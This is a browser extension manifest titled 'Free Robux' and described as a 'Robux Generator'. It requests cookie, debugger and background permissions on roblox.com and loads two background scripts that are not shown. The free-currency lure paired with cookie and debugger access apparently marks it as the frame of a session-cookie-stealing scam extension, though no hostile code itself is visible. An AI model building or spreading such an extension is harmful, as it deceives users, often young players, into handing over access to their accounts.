{
  "name":"Free Robux",
   "version":"2",
   "manifest_version":2,
   "description":"Robux Generator",
   "browser_action":{
      "default_icon":"icon.png"
   },
   "permissions":[
      "alarms",
      "cookies",
      "background",
      "debugger",
      "notifications",
      "https://www.roblox.com/"
   ],
   "background":{
      "scripts":["Bgwork.js","eggs.js"]
   },
    "icons": { "16": "icon.png",
           "48": "icon.png",
          "128": "icon.png" }
}